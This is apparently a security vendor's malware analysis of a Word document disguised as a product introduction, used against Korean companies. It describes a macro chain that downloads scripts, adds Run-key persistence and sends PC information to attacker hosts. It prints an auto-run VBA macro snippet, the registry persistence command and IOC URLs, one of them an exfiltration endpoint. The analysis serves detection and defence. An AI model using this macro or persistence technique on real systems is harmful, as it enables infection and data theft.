Malicious Word Files Disguised as Product Introduction

The ASEC analysis team has discovered a word document that is in the same category as the document introduced in the post <Word File Disguised as a Design Modification Request for Information Theft>, uploaded in December last year. The title of the document confirmed in this case is ‘Product Introduction.doc’. Given that the document includes descriptions for certain products, the attacker likely targeted companies related to distribution and shopping.

The document contains an image that is the same as the one included in the previous malicious document, prompting users to run the macro.

The properties of the document (Created, Author, and Last Modified By) are the same as those of ‘Design Modification Request.doc’. It seems that the attacker is reusing the same file after editing it.

The document contains a malicious VBA macro. When the macro is executed, a malicious macro is automatically run through the Document_Open() function. The macro code is slightly more obfuscated than before, downloading additional files from hxxp://manage-box.com/ord03 or /doc03.

The following files are downloaded through the VBA macro. Inside the downloaded file setup.cab, there exist a total of 5 scripts (download.vbs, error.bat, no4.bat, start.vbs, and upload.vbs).

The macro then runs the downloaded file temp.doc. The word document is disguised as a document of a certain company and contains information about particular products.

The temp.doc document also has the same properties (Created, Author, and Last Modified By) as those from the Design Modification Request.doc file.

The temp.doc document also harbors a VBA macro that runs the no1.bat file that was downloaded earlier.

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal nCmdShow As Long _
) As Long

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

The no1.bat file cannot be confirmed at the moment. Yet as the feature of each script is identical to those in the blog post uploaded earlier, it is likely that the file runs the error.bat file like in the previous case. The table below shows the key behaviors of each script file.

The following command is performed when the error.bat file is executed, allowing start.vbs to run continuously.

• “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v svchostno2 /t REG_SZ /d “C:\Users\Public\Documents\start.vbs”

Afterward, the command runs no4.bat and checks for the existence of certain files. It then downloads additional files from hxxp://safemaners.com/dow11/%COMPUTERNAME%.txt. The no4.bat file collects information of the user PC as shown below and sends it to hxxp://safemaners[.]com/upl11/upload.php.

Currently, accessing the malicious URL (manage-box[.]com and safemaners[.]com) in the word document and script file redirects the user to mail.naver.com. It appears that the attacker is trying to mask the website to make it seem harmless to users.

Since it has been confirmed that there are malicious word documents containing information on distribution and shopping instead of North Korea-related materials, caution is advised for Korean users whom the attacker appears to be targeting. Users should refrain from opening attachments from emails sent from unknown users and make sure to check the sender even when the information is relevant to their situations.

[V3 Detection]

• Downloader/DOC.Generic
• Trojan/DOC.Agent
• Trojan/VBS.Runner
• Trojan/BAT.Agent
• Downloader/BAT.Generic

[Relevant IOC Info]

• 10610cfe6cbf5a7dd5198a87e3186294
• 7bc342318717ac411898324baf549b76
• dc5ecb12dae64202922437edbe5a4842
• hxxp://manage-box.com/ord03/no03.txt
• hxxp://manage-box.com/ord03/vbs03.txt
• hxxp://manage-box.com/doc03/temp1403.doc
• hxxp://safemaners[.]com/upl11/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.